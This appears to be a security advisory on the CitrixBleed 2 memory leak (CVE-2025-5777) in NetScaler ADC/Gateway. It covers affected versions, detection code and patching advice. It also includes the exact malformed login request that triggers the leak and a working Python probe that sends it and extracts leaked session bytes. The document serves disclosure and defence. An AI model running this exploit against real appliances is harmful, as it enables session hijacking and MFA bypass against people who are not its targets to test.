CVE-2025-5777 – CitrixBleed 2: Memory Leak Vulnerability in Citrix NetScaler ADC/Gateway
Overview
A newly disclosed critical vulnerability in Citrix NetScaler ADC and NetScaler Gateway, identified as CVE-2025-5777, allows unauthenticated attackers to leak memory contents from vulnerable appliances via a specially crafted HTTP request. This flaw has been dubbed "CitrixBleed 2", referencing similarities to the original CitrixBleed (CVE-2023-4966).
A public proof of concept was published by @win3zz. The vulnerability affects widely deployed Citrix appliances and has already been exploited in the wild, including for session hijacking and credential exposure.
- CVE ID: CVE-2025-5777
- Vulnerability Type: Out-of-Bounds Read / Uninitialized Memory Disclosure
- Impact: Information Disclosure, Session Hijacking
- Affected Products: NetScaler ADC and NetScaler Gateway (formerly Citrix ADC/Gateway)
- Exploit Author: https://github.com/win3zz
- CVSS Score: 9.3 (Critical)
Vulnerability Details
The vulnerability is triggered by sending a malformed HTTP POST request to the NetScaler authentication endpoint:
POST /p/u/doAuthentication.do HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
login=admin&passwd
Notice that the passwd parameter lacks an = and a value (the Content-Length of 18 is the exact length of that body). When this malformed body is received, the code that builds the response never initializes the buffer holding the field's value but still copies it into the reply. As a result, uninitialized stack memory is echoed back in the server's XML response, specifically inside the <InitialValue> element.
Each request can leak up to 127 bytes, and because the buffer contents differ between requests, repeated queries progressively expose:
- Session tokens
- Usernames and passwords
- Configuration information
- Potentially sensitive in-memory data
This behavior is analogous to Heartbleed and CitrixBleed (2023), but the endpoint and trigger mechanism are different.
Affected Versions
According to Citrix's security advisory and community reports, the following versions are vulnerable:
- NetScaler ADC and Gateway:
  - 14.1 before 14.1-43.56
  - 13.1 before 13.1-58.32
  - 13.0 before 13.0-92.24
- NetScaler ADC FIPS:
  - 13.1 before 13.1-37.235
  - 12.1 before 12.1-55.328
Users of these builds are strongly encouraged to update immediately. Two caveats: the non-FIPS 12.1 and 13.0 branches are end of life, so verify the exact fixed build against the current Citrix advisory before relying on the numbers above; and the vulnerable endpoint is only exposed when the appliance is configured as a Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or as an AAA virtual server.
Proof of Concept
The GitHub repository provides a Python-based PoC script named exploit.py, which demonstrates how an attacker can repeatedly send crafted HTTP POST requests and retrieve leaked memory from the XML response.
Key Features:
- Uses aiohttp to send asynchronous requests
- Extracts the <InitialValue> field from the server response
- Dumps the memory leak in hex and ASCII for inspection
Sample Output:
00000000 4d 7a 35 7a 6a 4a 76 61 6e 39 68 61 38 79 6d 76 |Mz5zjJvan9ha8ymv|
00000010 55 4e 57 6c 4a 51 3d 3d 00 00 00 00 00 00 00 00 |UNWlJQ==........|
The dumped memory can contain base64-encoded session data, token strings, and other sensitive elements.
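The following is an added example written for this page; it is not win3zz's exploit.py and not Citrix code. It covers both the trigger described under Vulnerability Details and the dump format shown in the Sample Output: it builds the malformed request, pulls the raw bytes out of the <InitialValue> element of a response, and hex-dumps them in the same 16-byte layout. The response it parses is constructed inline (the wrapper tags are placeholders, not the appliance's real schema) so the file runs offline; send_probe shows how one request would be sent over TLS but is not invoked.

```python
"""Added example for this page: build the CitrixBleed 2 trigger request, extract the
<InitialValue> bytes from a response, and hex-dump them. Not win3zz's exploit.py.
The sample response below is constructed for offline use."""
import http.client
import re
import ssl
from typing import List, Optional

ENDPOINT = "/p/u/doAuthentication.do"
# The trigger body: "passwd" is sent as a bare key, with no "=" and no value.
TRIGGER_BODY = b"login=admin&passwd"
# Leaked memory is arbitrary binary, so match on bytes; an XML parser would
# raise on the first invalid byte instead of returning the payload.
_INITIAL_VALUE = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.S)

# Constructed sample: 32 bytes of "leak" (the page's sample dump) inside
# placeholder tags. A real appliance returns up to 127 bytes per request.
SAMPLE_LEAK = b"Mz5zjJvan9ha8ymvUNWlJQ==" + b"\x00" * 8
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\nContent-Type: text/xml\r\n\r\n"
    b"<AuthenticateResponse><InitialValue>" + SAMPLE_LEAK +
    b"</InitialValue></AuthenticateResponse>"
)


def build_request(host: str, body: bytes = TRIGGER_BODY) -> bytes:
    """Raw HTTP/1.1 request. Content-Length is derived from the body (18 for
    the default trigger), so it cannot be off by one."""
    head = (
        f"POST {ENDPOINT} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        f"Content-Length: {len(body)}\r\n\r\n"
    )
    return head.encode("ascii") + body


def extract_initial_value(response: bytes) -> Optional[bytes]:
    """Raw bytes between <InitialValue> and </InitialValue>, or None if absent."""
    m = _INITIAL_VALUE.search(response)
    return m.group(1) if m else None


def hexdump(data: bytes, width: int = 16) -> List[str]:
    """'offset  hex bytes  |ascii|' lines in the layout of the page's sample output."""
    lines = []
    for off in range(0, len(data), width):
        chunk = data[off:off + width]
        hexpart = " ".join(f"{b:02x}" for b in chunk).ljust(width * 3 - 1)
        text = "".join(chr(b) if 0x20 <= b < 0x7f else "." for b in chunk)
        lines.append(f"{off:08x} {hexpart} |{text}|")
    return lines


def send_probe(host: str, port: int = 443, verify_tls: bool = True,
               timeout: float = 10.0) -> Optional[bytes]:
    """Send one trigger request over TLS and return the leaked bytes (or None).
    Not called in this file; use only against appliances you are authorised to test."""
    ctx = ssl.create_default_context()
    if not verify_tls:  # appliances frequently present self-signed certificates
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)
    try:
        # http.client adds Content-Length from the bytes body automatically.
        conn.request("POST", ENDPOINT, body=TRIGGER_BODY,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        return extract_initial_value(conn.getresponse().read())
    finally:
        conn.close()


if __name__ == "__main__":
    print(build_request("target.example").decode("ascii"))
    leak = extract_initial_value(SAMPLE_RESPONSE)
    print("\n".join(hexdump(leak or b"")))
```

Running the file prints the request with a correct Content-Length and then the two dump lines shown in the Sample Output above. Against a live target the only change is replacing the constructed response with the bytes returned by send_probe; the byte-level regex matters there, because the leaked region will usually contain NULs and high bytes that no XML library will accept.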
Real-World Threat
Active Exploitation:
- CISA added CVE-2025-5777 to its Known Exploited Vulnerabilities (KEV) list.
- Attackers are using it to harvest session tokens and replay them to impersonate users; because a stolen token represents an already-authenticated session, this bypasses MFA without needing the user's credentials.
- Security firms reported exploitation in financial, government, and cloud infrastructure sectors.
Public Scanners and Exploits:
- Threat actors and security researchers alike are scanning for vulnerable endpoints.
- Tools like Shodan and custom scripts are being used to fingerprint exposed appliances.
Detection & Logging
Indicators of Compromise:
- Repeated POST requests to /p/u/doAuthentication.do with malformed parameters (a passwd field with no = and no value)
- Responses from the appliance containing <InitialValue> blocks with non-printable or otherwise unexpected bytes
- Unexpected session reuse or impersonation events, such as one session token used from several source IPs
Detection Techniques:
- Monitor HTTP logs for malformed passwd parameters; ordinary access logs do not record POST bodies, so this requires a WAF, a reverse proxy with body logging, or packet capture in front of the appliance
- Inspect returned XML for leaked memory patterns
- Use IDS signatures matching POST body anomalies on this endpoint
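The detection logic below is an added example written for this page, not Citrix or vendor tooling. It implements the four indicators listed above over constructed proxy/WAF log records: a bare passwd field in the POST body, an <InitialValue> element carrying non-printable bytes, repeated probes of the endpoint from one source, and one session token seen from more than one source IP. The records, addresses (RFC 5737 ranges), timestamps and the session field name are all constructed for the example; the schema assumes a log source that captures request and response bodies.

```python
"""Added example for this page (not Citrix or vendor code): CitrixBleed 2 detection
over CONSTRUCTED proxy/WAF log records that include request and response bodies."""
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

TARGET_PATH = "/p/u/doAuthentication.do"
_INITIAL_VALUE = re.compile(rb"<InitialValue>(.*?)</InitialValue>", re.S)
_WHITESPACE = {0x09, 0x0A, 0x0D}

Alert = Tuple[str, str, str]  # (rule, subject, detail)


def has_bare_key(body: str, key: str = "passwd") -> bool:
    """True if `key` is sent with no '=' at all. urllib.parse.parse_qs would map
    both 'passwd' and 'passwd=' to an empty value and hide exactly this difference."""
    return any(field == key for field in body.split("&"))


def suspicious_initial_value(response: bytes) -> bool:
    """True if <InitialValue> carries bytes outside printable ASCII and whitespace.
    A leak that happens to be all-printable is still caught by the request-side check."""
    m = _INITIAL_VALUE.search(response)
    if not m:
        return False
    return any((b < 0x20 and b not in _WHITESPACE) or b >= 0x7F for b in m.group(1))


def analyze(records: List[dict], probe_threshold: int = 3) -> List[Alert]:
    """Run all four indicators over the records and return the alerts raised."""
    alerts: List[Alert] = []
    probes: Dict[str, int] = defaultdict(int)
    session_sources: Dict[str, Set[str]] = defaultdict(set)
    for r in records:
        if r["method"] == "POST" and r["path"] == TARGET_PATH:
            probes[r["src"]] += 1
            if has_bare_key(r["body"]):
                alerts.append(("bare_passwd", r["src"], r["ts"]))
            if suspicious_initial_value(r["response"]):
                alerts.append(("leaked_initial_value", r["src"], r["ts"]))
        if r.get("session"):
            session_sources[r["session"]].add(r["src"])
    for src, n in probes.items():
        if n >= probe_threshold:
            alerts.append(("repeated_probe", src, f"{n} requests"))
    for sid, srcs in session_sources.items():
        if len(srcs) > 1:  # one session token replayed from a second source IP
            alerts.append(("session_reuse", sid, ",".join(sorted(srcs))))
    return alerts


def _rec(ts, src, method, path, body="", response=b"", session=None) -> dict:
    """Constructed log record; the field names are this example's own schema."""
    return {"ts": ts, "src": src, "method": method, "path": path,
            "body": body, "response": response, "session": session}


# Constructed sample: 203.0.113.7 probes the endpoint three times, then replays a
# session token first seen from the legitimate user at 198.51.100.20.
_LEAK_RESPONSE = b"<InitialValue>Mz5zjJvan9ha8ymv\x00\x00\x7f\x10</InitialValue>"
_OK_RESPONSE = b"<InitialValue></InitialValue>"
SAMPLE_RECORDS = [
    _rec("2025-06-25T10:00:01Z", "203.0.113.7", "POST", TARGET_PATH,
         "login=admin&passwd", _LEAK_RESPONSE),
    _rec("2025-06-25T10:00:02Z", "203.0.113.7", "POST", TARGET_PATH,
         "login=admin&passwd", _LEAK_RESPONSE),
    _rec("2025-06-25T10:00:03Z", "203.0.113.7", "POST", TARGET_PATH,
         "login=admin&passwd", _LEAK_RESPONSE),
    _rec("2025-06-25T10:05:00Z", "198.51.100.20", "POST", TARGET_PATH,
         "login=alice&passwd=hunter2", _OK_RESPONSE),
    _rec("2025-06-25T10:05:01Z", "198.51.100.20", "GET", "/vpn/index.html",
         session="sess-7f3a"),
    _rec("2025-06-25T10:09:30Z", "203.0.113.7", "GET", "/vpn/index.html",
         session="sess-7f3a"),
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_RECORDS):
        print(*alert)
```

The exact-match test in has_bare_key is deliberate: a normal login posts passwd=<value>, and even an empty passwd= is a well-formed field, so splitting on & and comparing whole fields is what separates the trigger from ordinary traffic. The same predicate is what a WAF rule in front of the appliance should express.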
Mitigation
Patch Immediately:
Upgrade to the following (or newer) versions:
- NetScaler ADC/Gateway 14.1 → 14.1-43.56
- NetScaler ADC/Gateway 13.1 → 13.1-58.32
- NetScaler ADC/Gateway 13.0 → 13.0-92.24
- FIPS/NDcPP builds → Apply corresponding patched firmware
Temporary Protections:
- Deploy WAF rules that block POST bodies to /p/u/doAuthentication.do in which passwd appears without an =; the WAF must sit in front of the appliance, since the vulnerable appliance is itself the TLS endpoint
- Restrict access to authentication endpoints from untrusted sources
- Enforce short session lifetimes and invalidate all existing sessions after upgrading, since tokens leaked before the patch stay valid until they are terminated; Citrix's advisory recommends running kill icaconnection -all and kill pcoipConnection -all on the upgraded appliance
Conclusion
CVE-2025-5777 is a highly dangerous memory disclosure bug affecting exposed NetScaler Gateway and AAA deployments. The ease of exploitation (a single unauthenticated request, no special tooling), combined with real-world impacts such as session hijacking and MFA bypass, makes it a critical issue that demands immediate attention.
Organizations using NetScaler ADC or Gateway should patch urgently, audit logs for signs of exploitation, and assume compromise if unpatched appliances were publicly accessible.